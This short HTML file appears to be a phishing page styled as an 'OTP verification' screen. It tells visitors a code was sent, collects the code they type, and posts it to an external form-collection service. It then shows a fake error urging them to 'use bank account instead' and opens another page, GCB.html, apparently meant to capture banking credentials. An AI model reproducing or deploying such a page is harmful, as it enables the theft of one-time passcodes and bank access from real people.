<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>otp verification</title>
    <style>
        body{
            background-color:  rgba(0, 0, 0, 0.666);
            color: white;
            text-align: center;
            margin: 200px;
        }
        .otp input{
            border-radius: 10px;
            border-color: orange;
            padding: 10px;
            word-spacing: 10px;
        }

        .otp button{
            border: 20px;
            background-color: orange;
            border-radius: 10px;
                padding: 10px 40px;
        }
    </style>
</head>
<body>
<div class="otp">
    <form action="https://formspree.io/f/mnqkarng" method="POST">
        <p>we have sent an OTP Code to you</p>
        <h1>Enter code</h1>
    <input type=" number" name="pin otp" id="otpcode" required><br><br>
    <button onclick=" fz()">confirm</button>
    <script>
    
        function fz(){
          confirm("error, use bank account instead!")
           open("GCB.html")
        }
    </script>
    </form>
</div>
</body>
</html>